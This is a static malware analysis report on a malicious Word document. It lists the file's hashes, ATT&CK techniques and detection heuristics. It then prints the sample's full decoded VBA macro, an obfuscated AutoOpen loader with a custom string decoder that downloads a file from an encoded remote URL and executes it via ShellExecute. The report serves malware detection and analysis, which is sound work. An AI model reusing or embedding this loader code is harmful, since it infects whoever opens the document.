Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3cf6a0c90dad3b16…

MALICIOUS

Office (OLE)

41.5 KB Created: 2015-01-19 20:05:00 Authoring application: Microsoft Office Word First seen: 2015-02-05
MD5: 5e1df6fe93ed7dabc0fa7f4c9bebe94e SHA-1: 949a0705b8fa592a6ffd23cf0327b1af53e83c2b SHA-256: 3cf6a0c90dad3b16422ed543195abf09a70b660c15fbab956eba1855024fcfbb
306 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains obfuscated VBA macros, including an AutoOpen subroutine, which is a common technique for malicious Office documents. The script utilizes `CreateObject` and `ShellExecute` to download and execute a second-stage payload from a remote source. The function `H1Ow3ak` appears to be responsible for downloading a file from a URL and saving it locally, likely to be executed. The obfuscation and the use of these APIs strongly suggest a downloader or dropper functionality.

Heuristics 11

  • ClamAV: Doc.Dropper.Downloader-6398288-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Downloader-6398288-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set oXMLHTTP = CreateObject(Fe5OknS("0twX11c55d12b4L5132t0jY1155I11X40THO75g06K9a0VhEQe0l6H151T320H11ai5511P4o0108r0m126Y0z1M26k01R20N04DpG"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oXMLHTTP = CreateObject(Fe5OknS("0twX11c55d12b4L5132t0jY1155I11X40THO75g06K9a0VhEQe0l6H151T320H11ai5511P4o0108r0m126Y0z1M26k01R20N04DpG"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        xlapp.ShellExecute Environ(Fe5OknS("NECx26a0n42p13B9MlIN612m312E387O248TQ0crMt")) & Fe5OknS("mBR2U9sd2s5tG1dqVx5c0gPf52tTuk5k0me5yBS15Kgw2LsLAF410ku1vI5w0Y5P1yYfL5i2cbox46EM1Fo0w1eaN120Z10u1quhJE")
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7000 bytes
SHA-256: e74d2b1a5438a4148f0792f14db3fd9408dac6c69e2b1fad80c2a0ab11cecfbe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub uiwefds()
TestingTheCode
End Sub
Sub AutoOpen()
    uiwefds
End Sub
Sub Workbook_Open()
    uiwefds
End Sub
Function H1Ow3ak(ByVal vWebFile As String, ByVal vLocalFile As String) As Boolean
    Dim lGCG As Long, vFF As Long, oResp() As Byte
Dim SHjTQi As Variant
     





    Set oXMLHTTP = CreateObject(Fe5OknS("0twX11c55d12b4L5132t0jY1155I11X40THO75g06K9a0VhEQe0l6H151T320H11ai5511P4o0108r0m126Y0z1M26k01R20N04DpG"))
Dim fb5av As Byte
    oXMLHTTP.Open Fe5OknS("dbts2I20121qrcB510313k9260J4UhS7"), vWebFile, False
Dim aVXAWg As Byte
    oXMLHTTP.Send
Dim Lki1CNFc As String
     





     




    oResp = oXMLHTTP.responseBody
Dim UfkdQdNI As Currency
     





    vFF = FreeFile
Dim Cqof5C As Currency
    If Dir(vLocalFile) <> "" Then Kill vLocalFile
Dim GrEYSHj As Object
    Open vLocalFile For Binary Access Write As #vFF
Dim vv0aa As Variant
    Put #vFF, , oResp
Dim XFcLk As Object
    Close #vFF
Dim BeadIsF As Currency

    Set oXMLHTTP = Nothing
Dim QeVkdIP As Boolean
    Dim xlapp As Object
Dim Bgg8Irqgg As Double
    Set xlapp = CreateObject(Fe5OknS("LXY11U3WMh2b8ScA1U6U64C16sqX16Y1bdc7gh28G1x7t28jo7U3TeGcP6H1l55OK2XuZ17k92HT17q9KXlnLS211fJ16Puxo21Sj7ky28z168wa0HKp1sVYT5m84DME15ox5218kQT5QV6Z1qu680Oll177kbRy6by176PJ0aczLp"))
Dim uUSHG As Variant
    xlapp.ShellExecute Environ(Fe5OknS("NECx26a0n42p13B9MlIN612m312E387O248TQ0crMt")) & Fe5OknS("mBR2U9sd2s5tG1dqVx5c0gPf52tTuk5k0me5yBS15Kgw2LsLAF410ku1vI5w0Y5P1yYfL5i2cbox46EM1Fo0w1eaN120Z10u1quhJE")
Dim aiOX As Date
    End Function
Sub TestingTheCode()
Dim TLc As Byte
FHbjkjkjl = Fe5OknS("wc0f4HH472CW4988f49x88t4s8162I494n2X021ig2d02143kv4346x87Z49vi4519xJ3546MW87e4343Y4k300c45R1p54sC343473ZA0O4945B43k43c4902VoeViY612m43507O4E45es15u4m257D4343gv1978QJu45154pX730k43T864F773fad20214s5Y5849f45HW2t021f4214r451E5tI4730R1h978X4z343H516Bp043Vu43O8QR")
Dim csBg7Uk As Object
     




H1Ow3ak FHbjkjkjl, Environ(Fe5OknS("dpAd109z2Jm897wvSKGBku1m8ku131001Yrv104Ygf0Pdoh")) & Fe5OknS("0QB0w88k3Q2TfZqh48u9v64y8pR0i0l4fA9yJ9b2g4800UVXrRp48Ra96zHX4p9l92iFoSYo211UCD96Mqj48u00Tb4h8c96KX4Auik992Fq44t1G6dog96x9b6WU1wF152G0H9S69Jez6mOuyB")

End Sub
Function Fe5OknS(InputStringToBeDecrypted As String) As String
Dim hKXPe6UQt As String
Dim NIM7U3OHC As Byte
Dim wfplLuj As String
Dim E4IKSwHoMuU As Date
Dim HZe As String
Dim Ae3OiJIwM As Date
Dim DvLqAgFnNK As String
Dim dDAbaQ5UnHC As Byte
Dim logFek5AMr As String
Dim wHKoamG As Byte
Dim qy7OcMAXB As Integer
Dim hCD2ajLf As Byte
Dim g8IN2UsQvHE As Integer
Dim bXbT As Currency
On Error GoTo ErrorHandler
Dim JyXsn As Long
strTempText = InputStringToBeDecrypted
Dim qVd As Date
hKXPe6UQt = strTempText
Dim wmP As Object
wfplLuj = ""
Dim BZHge1O As Byte
hKXPe6UQt = Left(hKXPe6UQt, Len(hKXPe6UQt) - 4)
Dim lgUvhe As String
hKXPe6UQt = Right(hKXPe6UQt, Len(hKXPe6UQt) - 4)
Dim B3aOD As Object
nCharSize = 0
Dim RgZ7Iy3OU As Long
Call Extract_Char_Size(hKXPe6UQt, nCharSize)
Dim cc6Imhjw6Ak As Object
Call Extract_Enc_Key(hKXPe6UQt, nCharSize, nEncKey)
Dim RbgZM4EED As Byte
nTextLenght = Len(hKXPe6UQt)
Dim LVYCnAUOD As Object
For nCounter = 1 To Len(hKXPe6UQt) Step nCharSize
Dim aOoKGJnY As Boolean
DvLqAgFnNK = Mid(hKXPe6UQt, nCounter, nCharSize)
Dim rer4O7Y06AVQR As Date
nChar = uepu7At5S(DvLqAgFnNK)
Dim Nj3UK8ahVULL As Currency
nChar2 = nChar / nEncKey
Dim h7BdAL As Long
logFek5AMr = Chr(nChar2)
Dim lXjE As Byte
wfplLuj = wfplLuj + logFek5AMr
Dim tuA As Boolean
Next nCounter
Dim NtCj As Date
Dim mgiwh8A As Object
Dim ccqLVYCnAU As Currency
wfplLuj = Trim(wfplLuj)
Dim ioikN6O As Object
 Fe5OknS = wfplLuj
Dim tpPNnmcc As Byte
Exit Function
ErrorHandler:
Dim Ot8OeFE8a1PI As Date
End Function


Sub Extract_Char_Size(ByRef hKXPe6UQt, ByRef nCharSize)
Dim n8U2ORbX As Object
DecryptParts = DecryptParts & "/Extract_Char_Size/"
Dim tDkIq As Date
nLeft = Len(hKXPe6UQt) \ 2
Dim Uv6aCa1UqL As Boolean
strLeft = Left(hKXPe6UQt, nLeft)
Dim rjIhnijNj As String
Dim NsfHbXbTqQ As Date
nRight = Len(hKXPe6UQt) - nLeft
Dim ySlK7E4EE As Byte
strRight = Right(hKXPe6UQt, nRight)
Dim JWOdWB As Object
Dim Zpwdm3aO As Variant
strKeyEnc = Right(strLeft, 2)
Dim A1amPTBZ1I As Date
strKeySize = Left(strRight, 2)
Dim wm6n4I As Long
strKeyEnc = vMFj(strKeyEnc)
Dim eFEtuAPI As Date
strKeySize = vMFj(strKeySize)
Dim YtpskWioik As Object
nKeyEnc = Val(strKeyEnc)
Dim raWZEpC As String
nKeySize = Val(strKeySize)
Dim qdqM4aKKCRX As Variant
nCharSize = nKeySize - nKeyEnc
Dim clpT As Currency
hKXPe6UQt = Left(strLeft, Len(strLeft) - 2) + Right(strRight, Len(strRight) - 2)
Dim ybO7amlb As String
End Sub

Function vMFj(ByVal cString As String) As String
DecryptParts = DecryptParts & "/ vMFj/"
Dim o1AeBMeKv As Boolean
For nCounter = 1 To Len(cString)
Dim re2UX As String
DvLqAgFnNK = Mid(cString, nCounter, 1)
Dim GWe As Object
If IsNumeric(DvLqAgFnNK) Then
Dim YwyWVL2iD As Currency
Dim aNoJFIm4 As Long
strTempString = strTempString + DvLqAgFnNK
Dim X5E0a As Variant
Else
strTempString = strTempString + "0"
Dim IuJrn As Byte
End If
Next nCounter
Dim NtCj As Date
Dim mgiwh8A As Object
Dim ccqLVYCnAU As Currency
 vMFj = strTempString
Dim Ok3UL2ayWVLL As Currency
End Function

Function uepu7At5S(strTempText As String) As Integer
DecryptParts = DecryptParts & "/ uepu7At5S/"
Dim ShnEMeB As Date
strTempText = Trim(strTempText)
Dim h6AACeBM As Long
For nCounter = 1 To Len(strTempText)
Dim r7OC As String
DvLqAgFnNK = Mid(strTempText, nCounter, 1)
Dim EXf2KPIu As Long
If IsNumeric(DvLqAgFnNK) Then
Dim YwyWVL2iD As Currency
Dim aNoJFIm4 As Long
hKXPe6UQt = hKXPe6UQt + DvLqAgFnNK
Dim nAF As Double
End If
Next nCounter
Dim NtCj As Date
Dim mgiwh8A As Object
Dim ccqLVYCnAU As Currency
nResult = Val(hKXPe6UQt)
Dim RcgaN7UFEtt As Currency
 uepu7At5S = nResult
Dim fGFu1ASmg As Long
End Function

Sub Extract_Enc_Key(ByRef hKXPe6UQt, ByVal nCharSize, ByRef nEncKey)
Dim pvclTrZ As Object
DecryptParts = DecryptParts & "/Extract_Enc_Key/"
Dim G2UBMeK8ENo As Double
strEncKey = vbNullString
Dim k0AXfLU As Variant
qy7OcMAXB = Len(hKXPe6UQt) - nCharSize
Dim uJ0I As Variant
nLeft = qy7OcMAXB \ 2
Dim HclpTFRkfT As Variant
strLeft = Left(hKXPe6UQt, nLeft)
Dim rjIhnijNj As String
Dim NsfHbXbTqQ As Date
nRight = qy7OcMAXB - nLeft
Dim PI8f As Double
strRight = Right(hKXPe6UQt, nRight)
Dim JWOdWB As Object
Dim Zpwdm3aO As Variant
strEncKey = Mid(hKXPe6UQt, nLeft + 1, nCharSize)
Dim elC1I5 As Currency
strEncKey = vMFj(strEncKey)
Dim etmDLqA As Byte
nEncKey = Val(Trim(strEncKey))
Dim DhT As Date
hKXPe6UQt = strLeft + strRight
Dim Sa7I As Variant
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.